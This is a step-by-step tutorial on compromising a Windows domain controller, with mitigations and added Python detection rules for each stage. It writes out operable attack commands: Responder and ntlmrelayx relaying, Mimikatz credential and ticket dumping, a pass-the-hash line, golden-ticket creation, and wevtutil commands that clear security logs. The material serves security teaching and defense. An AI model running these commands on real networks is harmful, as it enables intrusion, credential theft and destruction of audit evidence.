Domain Controller Hacking for Educational Purposes: Step-by-Step Guide

Disclaimer
This article is intended solely for educational purposes. The techniques described here should only be tested in controlled and authorized environments. Unauthorized use of these methods is illegal and unethical. Always follow legal and ethical guidelines when conducting security assessments.
Domain Controller Hacking: From Network Discovery to Full Compromise (Educational Purposes Only)
A Domain Controller (DC) is the core of a Windows Active Directory (AD) environment. It manages user authentication, enforces security policies, and stores sensitive data. Gaining control of a domain controller essentially grants control over the entire network.
In this tutorial, we will explore how attackers compromise domain controllers step by step, using tools like BloodHound, NTLM attacks, Impacket, and Mimikatz. Remember, these techniques are shared purely for educational purposes and should never be performed in unauthorized environments.
Step 1: Network Discovery
Keyword: Network Discovery for Domain Controllers
The first step in domain controller exploitation is network discovery. Attackers need to identify networked systems, especially domain controllers, and enumerate open ports and services.
A commonly used tool for this purpose is Nmap. To scan the network and find live hosts and open ports, run:
nmap -p 135,139,445,3389 -sS -T4 -oA dc-scan 192.168.1.0/24
Interpreting Results:
- Port 135 (RPC): Remote Procedure Call, used for administrative tasks.
- Port 139/445 (SMB): Used for file sharing and domain services.
- Port 3389 (RDP): Remote Desktop Protocol, used for remote administration.
Once domain controllers are identified, use Nmap scripts to gather more information:
nmap -p 445 --script=smb-enum-shares,smb-enum-users 192.168.1.10
Mitigation:
- Restrict SMB and RDP access to trusted IP ranges only.
- Implement firewall rules to minimize exposure.
- Monitor for unusual scanning activities on critical ports.
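The third mitigation, spotting the sweep that the Nmap command above produces, is easy to express as a rule over connection records. The following is an added example (not code from the original article): it reads a constructed, simplified firewall-style log in the format `<epoch_seconds> <src_ip> <dst_ip> <dst_port>` and flags a source that touches many hosts, or several of the DC-related ports, inside a short window. The thresholds and the log format are assumptions for the example.

```python
"""Flag sources whose connection pattern looks like the port sweep in Step 1.

Added example, not part of the original article. It reads a constructed,
simplified connection log ("<epoch_seconds> <src_ip> <dst_ip> <dst_port>"),
the kind of record a firewall or NetFlow exporter produces.
"""
from collections import defaultdict

# Ports the article's nmap command probes.
DC_PORTS = {135, 139, 445, 3389}

# Constructed sample: 10.0.0.5 sweeps port 445 across a subnet, 10.0.0.9 walks
# the DC ports on one host, 10.0.0.7 is an ordinary client using one file share.
SAMPLE_LOG = """\
1700000000 10.0.0.5 192.168.1.10 445
1700000001 10.0.0.5 192.168.1.11 445
1700000002 10.0.0.5 192.168.1.12 445
1700000003 10.0.0.5 192.168.1.13 445
1700000004 10.0.0.5 192.168.1.14 445
1700000010 10.0.0.7 192.168.1.10 445
1700000020 10.0.0.9 192.168.1.10 135
1700000021 10.0.0.9 192.168.1.10 139
1700000022 10.0.0.9 192.168.1.10 445
1700000023 10.0.0.9 192.168.1.10 3389
1700000100 10.0.0.7 192.168.1.10 445
1700000200 10.0.0.7 192.168.1.10 445
"""


def parse_line(line):
    ts, src, dst, port = line.split()
    return int(ts), src, dst, int(port)


def detect_scanners(lines, window=60, host_threshold=5, port_threshold=3):
    """Return {src_ip: reason} for sources that, inside any `window`-second
    span, touch >= host_threshold distinct hosts (horizontal sweep) or
    >= port_threshold distinct DC-related ports (vertical probe)."""
    by_src = defaultdict(list)
    for line in lines:
        if line.strip():
            ts, src, dst, port = parse_line(line)
            by_src[src].append((ts, dst, port))

    flagged = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window` seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            hosts = {dst for _, dst, _ in span}
            ports = {port for _, _, port in span if port in DC_PORTS}
            if len(hosts) >= host_threshold:
                flagged[src] = f"{len(hosts)} hosts in {window}s"
                break
            if len(ports) >= port_threshold:
                flagged[src] = f"{len(ports)} DC-related ports in {window}s"
                break
    return flagged


def analyze_sample():
    """Run the detector over the constructed sample log."""
    return detect_scanners(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for src, reason in analyze_sample().items():
        print(f"ALERT {src}: {reason}")
```

The sliding window matters: a slow scan spread over hours will not trip a 60-second window, so in practice the same rule is run again with a longer window and a higher threshold, and the ordinary client that keeps reconnecting to one share is never flagged because it touches one host and one port.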
Step 2: Active Directory Enumeration with BloodHound
Keyword: BloodHound for Active Directory Enumeration
BloodHound is a powerful tool for Active Directory enumeration, mapping out user and group relationships to identify potential attack paths. It stores the collected data in a Neo4j graph database and relies on collector scripts and executables such as SharpHound to gather it.
First, download and install BloodHound:
sudo apt install bloodhound
Start the Neo4j database:
sudo neo4j console
Launch BloodHound:
bloodhound
Data Collection:
Use the SharpHound ingestor to collect AD data from a compromised machine:
SharpHound.exe -c All -d domain.local -o All.zip
Upload the collected data to BloodHound and visualize attack paths, focusing on:
- Domain Admins
- High-privilege users
- Vulnerable group memberships
Mitigation:
- Limit permissions and group memberships.
- Regularly audit Active Directory configurations.
- Use Privileged Access Workstations (PAWs) for administrative tasks.
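The first two mitigations come down to knowing who effectively sits in Domain Admins, including through nested groups, which is exactly the relationship BloodHound draws. The following is an added example (not code from the original article or the BloodHound project) that expands group membership transitively and reports every account that reaches Domain Admins, with the chain of groups that grants it. The membership table is constructed; in practice it would be built from an AD export such as Get-ADGroupMember output or SharpHound's JSON.

```python
"""Resolve nested group membership to list who effectively holds Domain Admins
rights, the relationship BloodHound visualises.

Added example, not from the original article or the BloodHound project. The
membership table is constructed; in practice it would be built from an AD
export (for instance Get-ADGroupMember output or SharpHound's JSON).
"""
from collections import deque

# Constructed sample: group name -> direct members (users or other groups).
# Helpdesk-L3 also contains Tier0-Admins, a deliberate cycle, to show that the
# expansion terminates.
MEMBERSHIPS = {
    "Domain Admins": ["Administrator", "Tier0-Admins"],
    "Tier0-Admins": ["alice", "Helpdesk-L3"],
    "Helpdesk-L3": ["bob", "svc_backup", "Tier0-Admins"],
    "Helpdesk-L1": ["carol"],
    "Domain Users": ["alice", "bob", "carol", "dave"],
}


def effective_members(group, memberships):
    """Transitively expand `group`; returns {principal: chain of groups}
    where the chain shows how the principal reaches the group."""
    found = {}
    seen = {group}
    queue = deque([(group, [group])])
    while queue:
        current, chain = queue.popleft()
        for member in memberships.get(current, []):
            if member in memberships:            # a nested group
                if member not in seen:           # cycle / duplicate guard
                    seen.add(member)
                    queue.append((member, chain + [member]))
            else:
                found.setdefault(member, chain)  # BFS: first chain is the shortest
    return found


def audit_domain_admins(memberships, expected=("Administrator",)):
    """Return {principal: 'Group -> Subgroup -> ...'} for every account that
    ends up in Domain Admins without being on the expected list."""
    members = effective_members("Domain Admins", memberships)
    return {u: " -> ".join(chain) for u, chain in members.items() if u not in expected}


if __name__ == "__main__":
    for user, chain in audit_domain_admins(MEMBERSHIPS).items():
        print(f"{user}: {chain}")
```

Running it on the sample shows the usual audit finding: a helpdesk service account two levels down is a domain admin in all but name. The breadth-first expansion keeps the shortest chain per account, which is the one an administrator wants when deciding which nesting to remove.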
Step 3: NTLM Relay Attacks
Keyword: NTLM Relay Attacks with Impacket
NTLM is vulnerable to relay attacks, where an attacker intercepts authentication requests and relays them to gain unauthorized access.
Use Impacket’s ntlmrelayx to set up a relay server:
impacket-ntlmrelayx -tf targets.txt -smb2support
Launch Responder to capture NTLM hashes:
responder -I eth0
When a victim authenticates to the attacker’s machine, Responder captures the NTLMv2 hash, which can be relayed to another machine to gain access.
Mitigation:
- Enforce SMB signing to prevent NTLM relay attacks.
- Implement LDAP signing and channel binding.
- Disable NTLM where possible and enforce Kerberos.
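The three mitigations above are registry-backed settings, so a defender can verify them from a registry export rather than trusting a GPO report. The following is an added example (not code from the original article): it parses a constructed .reg-style text dump of the kind `reg export` produces, compares each setting with its hardened value, and lists a weak configuration beside a corrected one. The value names and paths are the real ones; the sample dumps are constructed.

```python
"""Audit the NTLM-relay hardening settings from Step 3 against a registry export.

Added example, not from the original article. It parses a constructed .reg-style
text dump (such as `reg export` produces) instead of querying a live host; the
value names and paths are the real ones, the required values are the hardened
settings.
"""
import re

HKLM = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"

# value path -> (minimum required value, meaning of the hardened setting)
REQUIRED = {
    HKLM + r"\Services\LanmanServer\Parameters\RequireSecuritySignature": (1, "SMB server signing required"),
    HKLM + r"\Services\LanmanWorkstation\Parameters\RequireSecuritySignature": (1, "SMB client signing required"),
    HKLM + r"\Services\NTDS\Parameters\LDAPServerIntegrity": (2, "LDAP signing required"),
    HKLM + r"\Services\NTDS\Parameters\LdapEnforceChannelBinding": (2, "LDAP channel binding always"),
    HKLM + r"\Control\Lsa\LmCompatibilityLevel": (5, "NTLMv2 only, LM and NTLMv1 refused"),
}

KEY_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg(text):
    """Return {full_value_path: int} for every DWORD in a .reg-style dump."""
    values, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = DWORD_RE.match(line)
        if m and key:
            values[key + "\\" + m.group(1)] = int(m.group(2), 16)
    return values


def audit(text):
    """Return {description: (current_or_None, required)} for each weak or
    missing setting. A missing value is reported because the defaults for
    these settings are weaker than the required value."""
    values = parse_reg(text)
    findings = {}
    for path, (required, desc) in REQUIRED.items():
        current = values.get(path)
        if current is None or current < required:
            findings[desc] = (current, required)
    return findings


# Constructed: a typical unhardened server (client signing not set at all).
WEAK = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"RequireSecuritySignature"=dword:00000000
"EnableSecuritySignature"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters]
"LDAPServerIntegrity"=dword:00000001
"LdapEnforceChannelBinding"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000003
"""

# Constructed: the same keys with the hardened values.
HARDENED = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"RequireSecuritySignature"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters]
"RequireSecuritySignature"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters]
"LDAPServerIntegrity"=dword:00000002
"LdapEnforceChannelBinding"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000005
"""

if __name__ == "__main__":
    for desc, (current, required) in audit(WEAK).items():
        print(f"WEAK: {desc}: found {current}, need {required}")
    print("hardened findings:", audit(HARDENED))
```

Note that `EnableSecuritySignature` (present in the weak dump) only advertises signing; relay protection comes from `RequireSecuritySignature`, which is why the audit ignores the former. A real `reg export` writes UTF-16 with a BOM, so decode the file before handing its text to `audit`.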
Step 4: Credential Dumping with Mimikatz
Keyword: Credential Dumping with Mimikatz
Mimikatz is a versatile tool for extracting credentials from Windows memory. It can dump password hashes, Kerberos tickets, and plain-text passwords.
Download Mimikatz and run as Administrator:
mimikatz.exe
Dumping Credentials:
Use the following command to list cached credentials:
privilege::debug
sekurlsa::logonpasswords
To dump Kerberos tickets for offline cracking:
sekurlsa::tickets
Pass-the-Hash Attack:
With extracted hashes, attackers can authenticate without needing plaintext passwords:
pth-winexe -U "DOMAIN/Administrator%aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0" //192.168.1.10 cmd.exe
Mitigation:
- Apply LSASS protection to block unauthorized memory access.
- Enable Credential Guard to isolate credential storage.
- Restrict administrative access and monitor logon events.
Step 5: Post-Exploitation and Persistence
Keyword: Maintaining Persistence in Domain Controllers
Once an attacker gains domain admin privileges, maintaining access becomes the priority. A common technique is to create Golden Tickets with Mimikatz:
mimikatz.exe "kerberos::golden /domain:domain.local /sid:S-1-5-21- /rc4:HASH /user:Administrator /id:500"
Persistence Tactics:
- Scheduled Tasks: Automate malicious scripts.
- Backdoor Accounts: Add a hidden domain admin.
- Group Policy Objects (GPO): Deploy malicious policies.
Mitigation:
- Monitor for unusual account creation and policy changes.
- Regularly audit GPO configurations.
- Detect abnormal Kerberos ticket usage with SIEM solutions.
Step 6: Cleanup and Covering Tracks
Keyword: Clearing Logs and Covering Tracks
Attackers often attempt to delete logs to hide their presence. Use wevtutil to clear logs:
wevtutil cl Security
wevtutil cl Application
Advanced attackers may also use log manipulation tools or modify event logs to retain only legitimate entries.
Mitigation:
- Enable Sysmon for advanced logging.
- Forward logs to a centralized server so that clearing the local logs does not destroy the record.
- Detect suspicious log clearance activities with automated alerts.
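The mitigations for Steps 4, 5 and 6 all reduce to rules over Windows event records: LSASS memory access (Sysmon event 10), new accounts and privileged group changes (4720, 4728/4732/4756), scheduled tasks and GPO edits (4698, 5136), RC4-encrypted Kerberos tickets of the kind a `/rc4` golden ticket produces (4768/4769 with encryption type 0x17), and log clearing (Security 1102, System 104). The following is an added example (not code from the original article or any SIEM product) that runs those rules over constructed sample events. The events are simplified dicts with the real EventID values and field names but the XML unwrapped and the channel names shortened; the LSASS allowlist is an assumption to be tuned per environment.

```python
"""Rules for the Step 4-6 activity the article describes: LSASS credential
access, persistence (new accounts, privileged group changes, scheduled tasks,
GPO edits, RC4 Kerberos tickets) and log clearing.

Added example, not from the original article or any SIEM product. Events are
constructed, simplified dicts; the EventID values and field names are those of
the real Security, System and Sysmon records, with XML unwrapped.
"""

# Processes that legitimately open LSASS; constructed allowlist, tune per estate.
LSASS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC, the type /rc4 golden tickets carry


def rule_lsass_access(e):
    if (e.get("Channel") == "Sysmon" and e.get("EventID") == 10
            and e.get("TargetImage", "").lower().endswith(r"\lsass.exe")
            and e.get("SourceImage", "").lower() not in LSASS_ALLOWLIST):
        return f"LSASS opened by {e['SourceImage']} (access {e.get('GrantedAccess')})"


def rule_account_created(e):
    if e.get("EventID") == 4720:
        return f"account {e['TargetUserName']} created by {e.get('SubjectUserName')}"


def rule_privileged_group_change(e):
    # 4728 / 4732 / 4756: member added to a global / local / universal security group
    if e.get("EventID") in (4728, 4732, 4756) and e.get("TargetUserName") in PRIVILEGED_GROUPS:
        return f"{e.get('MemberName')} added to {e['TargetUserName']} by {e.get('SubjectUserName')}"


def rule_scheduled_task(e):
    if e.get("EventID") == 4698:
        return f"scheduled task {e.get('TaskName')} created by {e.get('SubjectUserName')}"


def rule_gpo_modified(e):
    if e.get("EventID") == 5136 and e.get("ObjectClass") == "groupPolicyContainer":
        return f"GPO {e.get('ObjectDN')} modified by {e.get('SubjectUserName')}"


def rule_rc4_ticket(e):
    # A domain whose accounts have AES keys should not be issuing RC4 tickets.
    if e.get("EventID") in (4768, 4769) and e.get("TicketEncryptionType") == RC4_HMAC:
        return f"RC4 Kerberos ticket for {e.get('TargetUserName')} from {e.get('IpAddress')}"


def rule_log_cleared(e):
    # 1102: Security log cleared; System 104: any other log cleared (what wevtutil cl produces).
    if e.get("EventID") == 1102 or (e.get("Channel") == "System" and e.get("EventID") == 104):
        return f"event log cleared by {e.get('SubjectUserName')}"


RULES = [rule_lsass_access, rule_account_created, rule_privileged_group_change,
         rule_scheduled_task, rule_gpo_modified, rule_rc4_ticket, rule_log_cleared]


def run_rules(events):
    """Return [(rule_name, message)] for every event that matches a rule."""
    hits = []
    for e in events:
        for rule in RULES:
            msg = rule(e)
            if msg:
                hits.append((rule.__name__, msg))
    return hits


# Constructed sample events (not real telemetry); the first and fifth are benign.
SAMPLE_EVENTS = [
    {"Channel": "Sysmon", "EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"Channel": "Sysmon", "EventID": 10, "SourceImage": r"C:\Users\Public\dump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"Channel": "Security", "EventID": 4720, "TargetUserName": "svc_backup2", "SubjectUserName": "alice"},
    {"Channel": "Security", "EventID": 4728, "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc_backup2,CN=Users,DC=domain,DC=local", "SubjectUserName": "alice"},
    {"Channel": "Security", "EventID": 4769, "TargetUserName": "bob@DOMAIN.LOCAL",
     "TicketEncryptionType": "0x12", "IpAddress": "192.168.1.50"},
    {"Channel": "Security", "EventID": 4769, "TargetUserName": "Administrator@DOMAIN.LOCAL",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.1.77"},
    {"Channel": "Security", "EventID": 4698, "TaskName": r"\Updater", "SubjectUserName": "svc_backup2"},
    {"Channel": "Security", "EventID": 5136, "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN={GPO-GUID-PLACEHOLDER},CN=Policies,CN=System,DC=domain,DC=local",
     "SubjectUserName": "svc_backup2"},
    {"Channel": "Security", "EventID": 1102, "SubjectUserName": "svc_backup2"},
    {"Channel": "System", "EventID": 104, "SubjectUserName": "svc_backup2"},
]

if __name__ == "__main__":
    for name, msg in run_rules(SAMPLE_EVENTS):
        print(f"[{name}] {msg}")
```

Two points the sample makes: the allowlisted csrss.exe access and the AES (0x12) ticket produce no alert, so the rules are usable without drowning the analyst, and the final two events show why forwarding matters: the 1102 and 104 records are the last thing written before the local log is empty, and they only help if a copy already left the host.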
Conclusion
Compromising a domain controller grants attackers full control over an organization's infrastructure, making it a prime target. By understanding the attack chain, cybersecurity professionals can better defend against these threats. Implementing layered security measures, network segmentation, and continuous monitoring can significantly reduce the risk of a successful attack.
Again, this guide is strictly for educational purposes. Always obtain explicit authorization before conducting security assessments, and never use these techniques in unauthorized environments.